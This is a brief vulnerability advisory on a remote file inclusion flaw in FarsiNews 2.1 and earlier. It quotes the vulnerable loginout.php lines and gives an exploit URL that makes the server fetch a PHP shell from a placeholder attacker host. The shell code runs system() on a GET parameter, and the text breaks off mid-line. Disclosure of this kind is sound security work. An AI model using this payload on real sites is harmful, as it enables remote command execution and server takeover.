Remote File Inclusion in FarsiNews 2.1 and below Credit: The information has been provided by Hamid Ebadi (Hamid Network Security Team) :admin@hamid.ir. The original article can be found at : http://hamid.ir/security Vulnerable Systems: FarsiNews 2.1 Beta 2 and below Vulnerable Code: The following lines in loginout.php : require_once($cutepath."/inc/functions.inc.php"); require_once($cutepath."/data/config.php"); Exploits: If register_globals=ON has been marked (check PHP.INI) we can exploit below URL to cause it to include external file. The following URL will cause the server to include external files ( phpshell.txt ): http://[target]/loginout.php?cmd=dir&cutepath=http://[attacker]/phpshell.txt? phpshell.txt ------------------- system ($_GET['cmd']); die ("